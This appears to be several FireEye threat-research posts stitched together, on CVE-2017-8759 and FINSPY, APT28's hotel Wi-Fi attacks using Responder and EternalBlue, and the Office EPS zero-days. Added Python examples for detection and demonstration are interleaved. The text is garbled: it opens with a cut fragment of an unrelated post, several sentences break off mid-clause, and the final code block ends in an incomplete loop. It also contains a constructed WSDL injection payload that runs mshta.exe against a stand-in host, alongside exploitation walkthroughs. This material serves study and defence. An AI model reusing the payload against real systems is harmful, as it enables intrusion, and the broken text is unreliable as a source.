From January 2018 to March 2018, through FireEye’s Dynamic Threat
Intelligence, we observed attackers leveraging the latest code
execution and persistence techniques to distribute malicious
macro-based documents to individuals in As…
FireEye recently detected a malicious Microsoft Office RTF document
that leveraged CVE-2017-8759,
a SOAP WSDL
parser code injection vulnerability. This vulnerability allows a
malicious actor to inject arbitrary code during the parsing of SOAP
WSDL definition contents. FireEye analyzed a Microsoft Word document
where attackers used the arbitrary code injection to download and
execute a Visual Basic script that contained PowerShell commands.
FireEye shared the details of the vulnerability with Microsoft and
has been coordinating public disclosure timed with the release of a
patch to address the vulnerability and security guidance, which can be
FireEye email, endpoint and network products detected the malicious documents.
The malicious document, “Проект.doc” (MD5:
fe5c4d6bb78e170abf5cf3741868ea4c), might have been used to target a
Russian speaker. Upon successful exploitation of CVE-2017-8759, the
document downloads multiple components (details follow), and
eventually launches a FINSPY payload (MD5: a7b990d5f57b244dd17e9a937a41e7f5).
FINSPY malware, also reported as FinFisher or WingBird,
is available for purchase as part of a “lawful intercept” capability.
Based on this and previous use of FINSPY,
we assess with moderate confidence that this malicious document was
used by a nation-state to target a Russian-speaking entity for cyber
espionage purposes. Additional detections by FireEye’s Dynamic Threat
Intelligence system indicate that related activity, though
potentially for a different client, might have occurred as early as
A code injection vulnerability exists in the WSDL parser module
within the PrintClientProxy method (http://referencesource.microsoft.com/
– System.Runtime.Remoting/metadata/wsdlparser.cs,6111). The
IsValidUrl check does not reject input that contains a CRLF
sequence, which allows an attacker to inject and execute arbitrary
code. A portion of the vulnerable code is shown in
Figure 1: Vulnerable WSDL Parser
When multiple address definitions are provided in a SOAP
response, the code inserts the “//base.ConfigureProxy(this.GetType(),”
string after the first address, commenting out the remaining
addresses. However, if a CRLF sequence is in the additional addresses,
the code following the CRLF is not commented out. Figure 2 shows
that, because the CRLF is never validated, a
System.Diagnostics.Process.Start method call is injected. The
generated code is compiled by csc.exe of the .NET Framework and
loaded by the Office executable as a DLL.
Figure 2: SOAP definition VS Generated code
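To make the CRLF problem concrete, here is an added example, written for this page and not taken from Microsoft's wsdlparser.cs, that models the generator in Python: the first soap:address becomes live C#, every further address is parked behind "//", and the URL check either ignores control characters (as the vulnerable code does) or rejects them. The WSDL document, the host names and the mshta.exe command line inside it are constructed for the demonstration, and the emitted C# is a simplification of what PrintClientProxy produces.

```python
"""Model of the CVE-2017-8759 code-generation flaw: CRLF in a soap:address.

Simplified Python re-implementation written for this page, not Microsoft's
wsdlparser.cs.  It keeps only the behaviour the text describes: the first
soap:address becomes live C# and each additional address is emitted behind
"//" so that it is a comment.  Because the URL check does not reject CR/LF,
an address containing a line break escapes the comment and the remainder is
compiled by csc.exe as real code.  The WSDL document and the mshta.exe command
line inside it are constructed for the demonstration.
"""
import html
import re

ADDRESS_RE = re.compile(r'<soap:address\s+location\s*=\s*"([^"]*)"')
CONTROL_RE = re.compile(r"[\x00-\x1f]")


def wsdl_addresses(wsdl: str) -> list:
    """Pull every soap:address location out of a WSDL, with XML entities decoded."""
    return [html.unescape(loc) for loc in ADDRESS_RE.findall(wsdl)]


def is_valid_url_vulnerable(url: str) -> bool:
    """The check as the text describes it: scheme only, line breaks never considered."""
    return url.startswith(("http://", "https://"))


def is_valid_url_hardened(url: str) -> bool:
    """Scheme check plus refusal of anything that can end a line or a C# string literal."""
    if not url.startswith(("http://", "https://")):
        return False
    return not re.search(r'[\x00-\x1f"\\]', url)


def render_client_proxy(addresses: list, validator=is_valid_url_vulnerable) -> str:
    """Emit the C# fragment the generator produces for the accepted addresses."""
    accepted = [a for a in addresses if validator(a)]
    if not accepted:
        raise ValueError("no usable soap:address")
    lines = [f'this.Url = "{accepted[0]}";']
    for extra in accepted[1:]:
        # Meant to be inert: alternative endpoints parked behind a line comment.
        lines.append(f'//base.ConfigureProxy(this.GetType(), "{extra}");')
    return "\n".join(lines)


def live_statements(csharp: str) -> list:
    """The lines csc.exe would actually compile, i.e. everything not behind //."""
    return [ln.strip() for ln in csharp.splitlines()
            if ln.strip() and not ln.strip().startswith("//")]


def suspicious_addresses(wsdl: str) -> list:
    """Detection side: soap:address locations that carry control characters."""
    return [loc for loc in wsdl_addresses(wsdl) if CONTROL_RE.search(loc)]


# Constructed WSDL: a benign endpoint followed by an injected one.  The CR/LF is
# entity-encoded here so a strict XML parser preserves it; a raw line break in
# the attribute value is the other form worth looking for.
SAMPLE_WSDL = """<definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/">
  <service name="Svc"><port name="SvcSoap" binding="tns:SvcSoap">
    <soap:address location="http://wsdl.example.test/svc"/>
    <soap:address location="http://x.example.test/&#13;&#10;System.Diagnostics.Process.Start(&quot;mshta.exe&quot;, &quot;http://x.example.test/word.db&quot;);&#13;&#10;//"/>
  </port></service>
</definitions>"""

if __name__ == "__main__":
    addrs = wsdl_addresses(SAMPLE_WSDL)
    print("vulnerable generator compiles:")
    print("\n".join(live_statements(render_client_proxy(addrs))))
    print("hardened generator compiles:")
    print("\n".join(live_statements(render_client_proxy(addrs, is_valid_url_hardened))))
    print("flagged:", suspicious_addresses(SAMPLE_WSDL))
```

Run stand-alone, the vulnerable path compiles two statements (the URL assignment and the injected Process.Start call) while the hardened path compiles only the first; suspicious_addresses is the check worth running over any WSDL a document fetches, since a legitimate endpoint never needs a line break in its location.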
The attacks that FireEye observed in the wild leveraged a Rich Text
Format (RTF) document, similar to the CVE-2017-0199
documents we previously reported on. The malicious samples contained
an embedded SOAP moniker to facilitate exploitation (Figure 3).
Figure 3: SOAP Moniker
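As an added example for triaging RTF samples of the kind discussed here, serving both the SOAP-moniker documents above and the CVE-2017-0199 URL-moniker documents discussed later on this page, the following Python (written for this page, not FireEye's detection logic) pulls the hex blob out of every \objdata group, decodes it and searches for the little-endian byte form of the two standard Windows moniker CLSIDs. The CLSID values are the usual Windows ones; the RTF samples are constructed.

```python
"""Look inside RTF \\objdata blobs for OLE moniker CLSIDs.

Added example for this page, not FireEye's detection logic.  It extracts the
hex payload of every {\\*\\objdata ...} group, decodes it and searches the
decoded bytes for the little-endian form of two standard Windows CLSIDs: the
URL moniker abused by CVE-2017-0199 and the SOAP moniker abused by
CVE-2017-8759.  The RTF samples used below are constructed.
"""
import re
import uuid

MONIKER_CLSIDS = {
    "URL moniker (CVE-2017-0199 style)": "79eac9e0-baf9-11ce-8c82-00aa004ba90b",
    "SOAP moniker (CVE-2017-8759 style)": "ecabb0c7-7f19-11d2-978e-0000f8757e2a",
}


def clsid_bytes(guid_text: str) -> bytes:
    """On-disk GUID layout: Data1..Data3 little-endian, Data4 as written."""
    return uuid.UUID(guid_text).bytes_le


def objdata_groups(rtf: bytes):
    """Yield the body of each \\objdata group, tracking brace depth for nested groups."""
    needle = b"\\objdata"
    pos = 0
    while True:
        start = rtf.find(needle, pos)
        if start < 0:
            return
        i, depth = start + len(needle), 1
        while i < len(rtf) and depth:
            if rtf[i:i + 1] == b"{":
                depth += 1
            elif rtf[i:i + 1] == b"}":
                depth -= 1
            i += 1
        yield rtf[start + len(needle):i - 1]
        pos = i


def objdata_to_bytes(group: bytes) -> bytes:
    """Drop control words, whitespace and other non-hex noise, then decode the hex."""
    cleaned = re.sub(rb"\\[A-Za-z]+-?\d* ?", b"", group)
    cleaned = re.sub(rb"[^0-9A-Fa-f]", b"", cleaned)
    if len(cleaned) % 2:
        cleaned = cleaned[:-1]
    return bytes.fromhex(cleaned.decode("ascii"))


def scan_rtf(rtf: bytes) -> list:
    """Return the sorted labels of every moniker CLSID found in any \\objdata group."""
    hits = set()
    for group in objdata_groups(rtf):
        blob = objdata_to_bytes(group)
        for label, guid in MONIKER_CLSIDS.items():
            if clsid_bytes(guid) in blob:
                hits.add(label)
    return sorted(hits)


def build_sample_rtf(guid_text: str) -> bytes:
    """Constructed RTF whose object data carries the given CLSID, hex wrapped across lines."""
    payload = b"0105000002000000" + clsid_bytes(guid_text).hex().encode()
    wrapped = b"\r\n".join(payload[i:i + 16] for i in range(0, len(payload), 16))
    return (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document.8}"
            b"{\\*\\objdata " + wrapped + b"}}}")


if __name__ == "__main__":
    for label, guid in MONIKER_CLSIDS.items():
        print(label, "->", scan_rtf(build_sample_rtf(guid)))
```

The whitespace stripping matters because Word's RTF reader tolerates line breaks and stray control words inside the hex, and samples exploit that tolerance. This extractor is deliberately naive: it does not handle the \bin control word, ignorable groups splitting the hex, or other RTF obfuscation, so for production triage use a full RTF tokenizer such as rtfobj from oletools and treat this as the check to reproduce.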
The payload retrieves the malicious SOAP WSDL definition from an
attacker-controlled server. The WSDL parser, implemented in
System.Runtime.Remoting.ni.dll of the .NET Framework, parses the content
and writes a .cs source file to the working directory. csc.exe
of the .NET Framework then compiles the generated source into a
library, namely http[url path].dll. Microsoft Office then loads the
library, completing the exploitation stage. Figure 4 shows an example
library loaded as a result of exploitation.
Figure 4: DLL loaded
Upon successful exploitation, the injected code creates a new
process and leverages mshta.exe to retrieve an HTA script named
“word.db” from the same server. The HTA script removes the source
code, compiled DLL and the PDB files from disk and then downloads and
executes the FINSPY malware named “left.jpg,” which in spite of the
.jpg extension and “image/jpeg” content-type, is actually an
executable. Figure 5 shows the details of the PCAP of this malware transfer.
Figure 5: Live requests
The malware will be placed at
%appdata%\Microsoft\Windows\OfficeUpdte-KB[ 6 random numbers ].exe.
Figure 6 shows the process create chain under Process Monitor.
Figure 6: Process Created Chain
The “left.jpg” (md5: a7b990d5f57b244dd17e9a937a41e7f5) is a variant
of FINSPY. It leverages heavily obfuscated code that employs a
built-in virtual machine – among other anti-analysis techniques – to
make reversing more difficult. As likely another unique anti-analysis
technique, it parses its own full path and searches for the string
representation of its own MD5 hash. Many resources, such as analysis
tools and sandboxes, rename files/samples to their MD5 hash in order
to ensure unique filenames. This variant runs with a mutex of “WininetStartupMutex0”.
CVE-2017-8759 is the second zero-day vulnerability used to
distribute FINSPY uncovered by FireEye in 2017. These exposures
demonstrate the significant resources available to “lawful intercept”
companies and their customers. Furthermore, FINSPY has been sold to
multiple clients, suggesting the vulnerability was being used against
It is possible that CVE-2017-8759 was being used by additional
actors. While we have not found evidence of this, the zero-day used
to distribute FINSPY in April 2017, CVE-2017-0199, was
simultaneously being used by a financially motivated actor. If the
actors behind FINSPY obtained this vulnerability from the same source
used previously, it is possible that source sold it to additional actors.
Thank you to Dhanesh Kizhakkinan, Joseph Reyes, FireEye Labs Team,
FireEye FLARE Team and FireEye iSIGHT Intelligence for their
contributions to this blog. We also thank everyone from the Microsoft
Security Response Center (MSRC) who worked with us on this issue.
FireEye has moderate confidence that a campaign targeting the
hospitality sector is attributed to Russian actor APT28.
We believe this activity, which dates back to at least July 2017, was
intended to target travelers to hotels throughout Europe and the
Middle East. The actor has used several notable techniques in these
incidents such as sniffing passwords from Wi-Fi traffic, poisoning the
NetBIOS Name Service, and spreading laterally via the EternalBlue exploit.
FireEye has uncovered a malicious document sent in spear phishing
emails to multiple companies in the hospitality industry, including
hotels in at least seven European countries and one Middle Eastern
country in early July. Successful execution of the macro within the
malicious document results in the installation of APT28’s signature GAMEFISH malware.
The malicious document – Hotel_Reservation_Form.doc (MD5:
9b10685b774a783eabfecdb6119a8aa3), as seen in Figure 1 – contains a
macro that base64 decodes a dropper that then deploys APT28’s
signature GAMEFISH malware (MD5: 1421419d1be31f1f9ea60e8ed87277db),
which uses mvband.net and mvtband.net as command and control (C2) domains.
Figure 1: Hotel_Reservation_Form.doc
APT28 is using novel techniques involving the EternalBlue exploit
and the open source tool Responder to spread
laterally through networks and likely target travelers. Once inside
the network of a hospitality company, APT28 sought out machines that
controlled both guest and internal Wi-Fi networks. No guest
credentials were observed being stolen at the compromised hotels;
however, in a separate incident that occurred in Fall 2016, APT28
gained initial access to a victim’s network via credentials likely
stolen from a hotel Wi-Fi network.
Upon gaining access to the machines connected to corporate and guest
Wi-Fi networks, APT28 deployed Responder. Responder performs
NetBIOS Name Service (NBT-NS) poisoning: it listens for NBT-NS
(UDP/137) name-resolution broadcasts from victim computers that are
trying to reach a network resource, answers as if it were that
resource, and so induces the victim to authenticate to the
attacker-controlled machine, handing over the username and an NTLM
challenge-response hash of the password. APT28 used this technique to
steal usernames and password hashes that allowed escalation of
privileges in the victim network.
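As an added example, not FireEye's or Responder's code, of turning the NBT-NS behaviour just described against the poisoner: a legitimate host only answers name queries for names it has registered, so a broadcast query for a random, never-registered canary name that draws a positive answer points at a poisoner on the segment. This canary technique is a standard defensive check rather than something the post describes; the packet builder and parser follow the RFC 1002 name query request and positive name query response layouts, and the response used in the demonstration is constructed inline so the module runs offline.

```python
"""NBT-NS canary probe: does anyone on this segment answer for names nobody owns?

Added example for this page, not FireEye's or Responder's code.  A poisoner
such as Responder replies to NBT-NS name queries for any name it sees, so a
query for a random name that draws a positive answer points at a poisoner.
Packet layout follows RFC 1002 name query request / positive name query
response; the response used in the demonstration is constructed inline.
"""
import os
import socket
import struct

NBNS_PORT = 137
QTYPE_NB = 0x0020
QCLASS_IN = 0x0001


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding: 15 space-padded chars + suffix byte, each nibble -> 'A'+nibble."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    return b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)


def decode_netbios_name(encoded: bytes):
    """Inverse of encode_netbios_name; returns (name, suffix)."""
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_nbns_query(name: str, txid: int) -> bytes:
    """Broadcast name query: flags 0x0110 = query, recursion desired, broadcast."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    question = b"\x20" + encode_netbios_name(name) + b"\x00" + struct.pack(">HH", QTYPE_NB, QCLASS_IN)
    return header + question


def parse_nbns_response(packet: bytes, expected_txid: int) -> list:
    """Return the IPs in a positive NB answer matching our transaction ID, else []."""
    if len(packet) < 12 + 34 + 10:
        return []
    txid, flags, _qd, ancount, _ns, _ar = struct.unpack(">HHHHHH", packet[:12])
    if txid != expected_txid or not flags & 0x8000 or flags & 0x000F or ancount == 0:
        return []          # wrong transaction, not a response, or negative RCODE
    off = 12
    if packet[off] != 0x20:
        return []
    off += 1 + 32 + 1      # length byte, encoded name, terminator
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", packet[off:off + 10])
    off += 10
    if rtype != QTYPE_NB:
        return []
    rdata = packet[off:off + rdlen]
    # RDATA is a run of 6-byte entries: NB_FLAGS (2) + NB_ADDRESS (4)
    return [socket.inet_ntoa(rdata[i + 2:i + 6]) for i in range(0, len(rdata) - 5, 6)]


def build_nbns_positive_response(name: str, txid: int, ip: str) -> bytes:
    """What a poisoner sends back (constructed here so the parser can be exercised offline)."""
    header = struct.pack(">HHHHHH", txid, 0x8500, 0, 1, 0, 0)   # response, AA, RD
    rr = b"\x20" + encode_netbios_name(name) + b"\x00"
    rr += struct.pack(">HHIH", QTYPE_NB, QCLASS_IN, 300000, 6)
    rr += struct.pack(">H", 0x0000) + socket.inet_aton(ip)      # NB_FLAGS: B-node, unique
    return header + rr


def probe_for_poisoner(timeout: float = 2.0, broadcast: str = "255.255.255.255"):
    """Live probe: broadcast a query for a random canary name and collect any positive answers."""
    canary = "CANARY" + os.urandom(3).hex().upper()              # 12 chars, never registered
    txid = int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    sock.settimeout(timeout)
    answers = []
    try:
        sock.sendto(build_nbns_query(canary, txid), (broadcast, NBNS_PORT))
        while True:
            data, (src, _port) = sock.recvfrom(1024)
            ips = parse_nbns_response(data, txid)
            if ips:
                answers.append((src, ips))
    except socket.timeout:
        pass
    finally:
        sock.close()
    return canary, answers
```

probe_for_poisoner is the only function that touches the network; run it from a host on the Wi-Fi segment in question (no privileged port is needed, because the poisoner answers to the source port of the query). Any entry in the returned list is a host claiming to own a name that was generated seconds earlier, which on a hotel or corporate network is worth investigating immediately. The same idea applies to LLMNR (UDP/5355), which Responder also poisons, though the packet format differs.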
To spread through the hospitality company’s network, APT28 used a
version of the EternalBlue SMB exploit. This was combined with the
heavy use of py2exe to compile Python scripts. This is the first time
we have seen APT28 incorporate this exploit into their intrusions.
In the 2016 incident, the victim was compromised after connecting to
a hotel Wi-Fi network. Twelve hours after the victim initially
connected to the publicly available Wi-Fi network, APT28 logged into
the machine with stolen credentials. These 12 hours could have been
used to crack a hashed password offline. After successfully accessing
the machine, the attacker deployed tools on the machine, spread
laterally through the victim’s network, and accessed the victim’s OWA
account. The login originated from a computer on the same subnet,
indicating that the attacker machine was physically close to the
victim and on the same Wi-Fi network.
We cannot confirm how the initial credentials were stolen in the
2016 incident; however, later in the intrusion, Responder was
deployed. Since this tool allows an attacker to sniff passwords from
network traffic, it could have been used on the hotel Wi-Fi network to
obtain a user’s credentials.
Cyber espionage activity against the hospitality industry is
typically focused on collecting information on or from hotel guests of
interest rather than on the hotel industry itself, though actors may
also collect information on the hotel as a means of facilitating
operations. Business and government personnel who are traveling,
especially in a foreign country, often rely on systems to conduct
business other than those at their home office, and may be unfamiliar
with threats posed while abroad.
APT28 isn’t the only group targeting travelers. South Korea-nexus
Fallout Team (aka Darkhotel) has used spoofed
software updates on infected Wi-Fi networks in Asian hotels, and
Duqu 2.0 malware has been found
on the networks of European hotels used by participants in the
Iranian nuclear negotiations. Additionally, open sources have reported
for several years that in Russia and China, high-profile hotel guests
may expect their hotel rooms to be entered and their laptops and other
electronic devices accessed.
These incidents show a novel infection vector being used by APT28.
The group is leveraging less secure hotel Wi-Fi networks to steal
credentials and a NetBIOS Name Service poisoning utility to escalate
privileges. APT28’s already wide-ranging capabilities and tactics are
continuing to grow and refine as the group expands its infection vectors.
Travelers must be aware of the threats posed when traveling –
especially to foreign countries – and take extra precautions to secure
their systems and data. Publicly accessible Wi-Fi networks present a
significant threat and should be avoided whenever possible.
Additional technical information and details are available to FireEye
iSIGHT Intelligence customers through our portal.
In 2015, FireEye published details about two attacks exploiting
vulnerabilities in Encapsulated PostScript (EPS) of Microsoft Office.
One was a zero-day
and one was patched
weeks before the attack launched.
Recently, FireEye identified three new zero-day vulnerabilities in
Microsoft Office products that are being exploited in the wild.
At the end of March 2017, we detected another malicious document
leveraging an unknown vulnerability in EPS and a recently patched
vulnerability in Windows Graphics Device Interface (GDI) to drop
malware. Following the April 2017 Patch Tuesday, in which Microsoft
disabled EPS, FireEye detected a second unknown vulnerability in EPS.
FireEye believes that two actors – Turla
and an unknown financially motivated actor – were using the first EPS
zero-day (CVE-2017-0261), and that APT28 was using the second EPS zero-day (CVE-2017-0262)
along with a new Escalation of Privilege (EOP) zero-day (CVE-2017-0263).
Turla and APT28 are Russian cyber espionage groups that have used
these zero-days against European diplomatic and military entities. The
unidentified financial group targeted regional and global banks with
offices in the Middle East. The following is a description of the EPS
zero-days, associated malware, and the new EOP zero-day. Each EPS
zero-day is accompanied by an EOP exploit, with the EOP being required
to escape the sandbox that executes the FLTLDR.EXE instance used for
rendering the embedded EPS image.
The malicious documents have been used to deliver three different
payloads. CVE-2017-0261 was used to deliver SHIRIME (Turla) and
NETWIRE (unknown financially motivated actor), and CVE-2017-0262 was
used to deliver GAMEFISH (APT28). CVE-2017-0263 is used to escalate
privileges during the delivery of the GAMEFISH payload.
FireEye has been coordinating with the Microsoft Security Response
Center (MSRC) for the responsible disclosure of this information.
Microsoft advises all customers to follow the guidance in security
advisory ADV170005 as a defense-in-depth measure against EPS
Upon opening the Office document, FLTLDR.EXE is used to
render an embedded EPS image, which contains the exploit. The EPS file
is a PostScript program that leverages a Use-After-Free
vulnerability in the restore operator.
From the PostScript
Manual: “Allocations in local VM and modifications to existing
objects in local VM are subject to a feature called save and
restore, named after the operators that invoke it. save
and restore bracket a section of a PostScript language program
whose local VM activity is to be encapsulated. restore
deallocates new objects and undoes modifications to existing objects
that were made since the matching save.”
As the manual describes, the restore operator reclaims memory
allocated since the matching save. Combined with the forall operator,
which keeps iterating over an array whose storage restore has already
released, this creates an ideal Use-After-Free condition. Figure 1 shows
the pseudo code that exploits the save and restore operators.
Figure 1: Pseudo code for the exploit
The following operations allow the Pseudo code to leak metadata
enabling a read/write primitive:
Figure 2 demonstrates a debug log of the uaf_array being used after
restore has reclaimed it.
Figure 2: uaf_array reclaimed debug log
By manipulating the operations after the save operator, the
attacker controls the memory layout and converts the
Use-After-Free into a read/write primitive. Figure 3 shows the
faked string object, with its length set to 0x7fffffff and its base to 0.
Figure 3: Faked String Object
Leveraging the ability to read and write arbitrary user memory,
the EPS program continues by searching for gadgets to build the ROP
chain, and creates a faked file object. Figure 4 demonstrates the
faked file object.
Figure 4: Fake File Object, with ROP
By invoking the closefile operator on the faked file object, the exploit
pivots to the ROP chain and starts the shellcode. Figure 5 shows part of the
closefile operator handler.
Figure 5: Stack Pivot disassembler of closefile
Once execution has been achieved, the malware uses the ROP chain to
change the execution protection of the memory region containing the
shellcode. At this point, the shellcode is running within a sandbox
that was executing FLTLDR.EXE and an escalation of privilege is
required to escape that sandbox.
FireEye detected two different versions of the EPS program
exploiting this vulnerability. The first, st07383.en17.docx,
continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to
escalate privilege before dropping a file
containing a malware implant known as SHIRIME. SHIRIME is one of
payload to conduct initial profiling of a target system and implement
command and control. Since early 2016, we have observed multiple
iterations of SHIRIME used in the wild, with the most recent version
(v1.0.1004) employed in this zero-day
The second document, Confirmation_letter.docx, continues by
utilizing 32 or 64 bit versions of CVE-2016-7255 to escalate privilege
before dropping a new variant of the NETWIRE malware family. Several
versions of this document were seen with similar filenames.
The EPS programs contained within these documents used
different logic to construct the ROP chain and build the
shellcode. The first took the additional step of using a
simple algorithm, shown in Figure 6, to obfuscate sections of the shellcode.
Figure 6: Shellcode obfuscation algorithm
The second EPS vulnerability is a type confusion in the procedure
object passed to the forall operator, which lets an attacker alter the
execution flow and push values of their choosing onto the operand
stack. This vulnerability was found
in a document named “Trump’s_Attack_on_Syria_English.docx”.
Before triggering the vulnerability, the EPS program sprays
memory with predefined data so that specific addresses hold
attacker-controlled content, which facilitates exploitation. Figure 7
shows the PostScript code snippet that sprays memory with a string.
Figure 7: PostScript code snippet of spray
After execution, the content of the string occupies memory at
address 0x0d80d000, producing the memory layout shown in Figure 8.
The exploit uses this layout and content to forge a procedure
object and manipulate the code flow so that the predefined values,
highlighted in yellow, are pushed onto the operand stack.
Figure 8: Memory layout of the sprayed data
After spraying the heap, the exploit goes on to execute a
statement of the following form: 1 array 16#D80D020 forall.
It creates an Array object, supplies the hex number
0xD80D020 in place of a procedure, and calls the forall operator. During
the operation of the forged procedure within the forall operator, it
precisely controls the execution flow to store values of the attacker’s
choosing on the operand stack. Figure 9 shows the major code flow consuming
the forged procedure.
Figure 9: Consuming the forged procedure
After execution of forall, the contents of the stack are
under the attacker’s control, as shown in Figure 10.
Figure 10: Stack after the forall execution
Since the operand stack has been manipulated, the subsequent
exch operations define objects based on the data from the
manipulated stack, as shown in Figure 11.
Figure 11: Subsequent code to retrieve data from stack
A18 is a string type object with a length field of
0x7ffffff0 and a base of 0; its memory layout is shown in Figure 12.
Figure 12: A18 String Object
A19 is an array type object whose member values are all purposely
crafted. The exploit defines another array object and puts it into the
forged array A19, which places the pointer to the newly
created array object inside A19. The exploit can then directly
read the value at the predictable address 0xD80D020 + 0x38,
leak its vftable pointer and infer the base address of EPSIMP32.flt. Figure
13 shows code snippets for leaking the EPSIMP32 base address.
Figure 13: Code snippet of leaking module base
Figure 14 shows the operand stack when the put operator is called and
the forged array A19 after the put operation has finished.
Figure 14: Array A19 after the put operation
By leveraging the RW primitive string and the leaked module base of
EPSIMP32, the exploit continues by searching for ROP gadgets, creating a
fake file object, and pivoting to the shellcode through the
bytesavailable operator. Figure 15 shows the forged file type
object and the disassembly of the pivot to ROP and shellcode.
Figure 15: Pivots to ROP and Shellcode
The shellcode continues by using a previously unknown EOP,
CVE-2017-0263, to escalate privileges to escape the sandbox running
FLTLDR.EXE, and then drop and execute a GAMEFISH payload. Only a
32-bit version of CVE-2017-0263 is contained in the shellcode.
The EOP Exploit setup starts by suspending all threads other than
the current thread and saving the thread handles to a table, as shown
in Figure 16.
Figure 16: Suspending Threads
The exploit then checks the OS version and uses that information to
populate version-specific fields such as the token offset, syscall number,
etc. An executable memory area is allocated and populated with kernel
mode shellcode as well as the address information the
shellcode requires. A new thread is created to trigger the vulnerability
and drive the rest of the exploitation.
The exploit starts by creating three PopupMenus and appending menus
to them, as shown in Figure 17. It also creates 0x100 windows with
random class names. The User32!HMValidateHandle trick is used to leak
the tagWnd address, which serves as the kernel information leak
throughout the exploit.
Figure 17: Popup menu creation
RegisterClassExW is then used to register a window class
“Main_Window_Class” whose WndProc points to a function that calls
DestroyWindow on each window in the table built by EventHookProc, explained
later in this post. This function also shows the first popup menu,
which was created earlier.
Two extra windows are created with the class name
“Main_Window_Class”. SetWindowLong is used to change the WndProc of the second
window, wnd2, to a shellcode address. An application-defined hook,
WindowHookProc, and an event hook, EventHookProc, are installed by
SetWindowsHookExW and SetWinEventHook respectively. PostMessage is
used to post 0xABCD to the first window, wnd1.
EventHookProc waits for EVENT_SYSTEM_MENUPOPUPSTART and saves
the window’s handle to a table. WindowHookProc looks for the SysShadow
class name and sets a new WndProc for the corresponding window.
Inside this WndProc, the NtUserMNDragLeave syscall is invoked and
SendMessage is used to send 0x9f9f to wnd2, invoking the shellcode
shown in Figure 18.
Figure 18: Triggering the shellcode
The Use-After-Free happens during the kernel’s handling of WM_NCDESTROY and
overwrites wnd2’s tagWnd structure, setting the bServerSideWindowProc
flag. With bServerSideWindowProc set, the user mode WndProc is
treated as a kernel callback and is invoked from kernel
context – in this case wnd2’s WndProc is the shellcode.
The shellcode first confirms that the memory corruption has occurred by
checking that the code segment is not the user mode code segment, and
that the message received is 0x9f9f. Once validated, the
shellcode finds the TOKEN address of the current process and the
TOKEN of the System process (pid 4), then copies the System
process’ token over the current process’ token, elevating the current
process to SYSTEM.
EPS processing has become a ripe exploitation space for attackers.
FireEye has discovered and analyzed two of these recent EPS
zero-days with examples seen before and after Microsoft disabled EPS
processing in the April 2017 Patch Tuesday. The documents explored
utilize differing EPS exploits, ROP construction, shellcode, EOP
exploits and final payloads. While these documents are detected by
FireEye appliances, users should exercise caution because FLTLDR.EXE
is not monitored by EMET.
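As an added triage example, written for this page and not FireEye's detection logic: both exploits above arrive as EPS images that FLTLDR.EXE renders, so the first check on a suspicious Office document is whether the package carries an EPS member at all, and which of the operators the analysis singles out (save/restore, forall, closefile, bytesavailable) its PostScript program uses. The .docx package and the EPS program below are constructed; the handling of the DOS EPS binary header follows Adobe's EPS format, and the operator counts are an analyst's prioritisation aid, not a verdict.

```python
"""Triage helper for EPS content inside an OOXML (.docx) package.

Added example for this page, not FireEye's detection logic.  Word keeps
embedded images as zip members, and FLTLDR.EXE only comes into play when one
of them is EPS, so the presence of an EPS member is the first thing to check
on a document that arrived while the April 2017 EPS mitigation was not yet
applied.  The PostScript operator counts are a prioritisation aid for an
analyst, not a verdict.  The sample document below is constructed in memory.
"""
import io
import re
import struct
import zipfile

EPS_TEXT_MAGIC = b"%!PS-Adobe"
EPS_BINARY_MAGIC = b"\xC5\xD0\xD3\xC6"   # DOS EPS header: preview + PostScript sections

# Operators the two exploits described above rely on.
WATCHED_OPERATORS = ("save", "restore", "forall", "closefile", "bytesavailable")


def is_eps(data: bytes) -> bool:
    """Recognise either the textual EPS header or the DOS EPS binary wrapper."""
    if data.startswith(EPS_BINARY_MAGIC):
        return True
    return data.startswith(EPS_TEXT_MAGIC) and b"EPSF" in data[:64]


def postscript_body(data: bytes) -> bytes:
    """Return the PostScript program, unwrapping the DOS EPS binary header if present."""
    if data.startswith(EPS_BINARY_MAGIC):
        ps_offset, ps_length = struct.unpack("<II", data[4:12])
        return data[ps_offset:ps_offset + ps_length]
    return data


def operator_counts(ps: bytes) -> dict:
    """Count executions of the watched operators, ignoring comments and /literal names."""
    text = re.sub(r"%[^\n]*", "", ps.decode("latin-1"))
    return {op: len(re.findall(rf"(?<![\w/]){op}(?!\w)", text)) for op in WATCHED_OPERATORS}


def triage_docx(docx_bytes: bytes) -> list:
    """List every EPS member in the package with its size and operator profile."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as package:
        for info in package.infolist():
            data = package.read(info)
            if is_eps(data):
                findings.append({
                    "member": info.filename,
                    "size": len(data),
                    "operators": operator_counts(postscript_body(data)),
                })
    return findings


# --- constructed inputs for the demonstration -------------------------------

SAMPLE_EPS = b"""%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: 0 0 10 10
% toy program constructed for this example; it draws nothing and exploits nothing
/a 1 array def
save
a 0 (x) put
restore
[1 2 3] { pop } forall
showpage
"""


def build_dos_eps(ps: bytes) -> bytes:
    """Wrap a PostScript program in the 30-byte DOS EPS binary header (no previews)."""
    header = EPS_BINARY_MAGIC + struct.pack("<IIIIII", 30, len(ps), 0, 0, 0, 0) + b"\xff\xff"
    return header + ps


def build_sample_docx(image_bytes: bytes, member="word/media/image1.eps") -> bytes:
    """Minimal OOXML-shaped zip carrying one media member (constructed, not a real Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("word/document.xml", "<w:document/>")
        package.writestr(member, image_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_docx(build_sample_docx(SAMPLE_EPS)):
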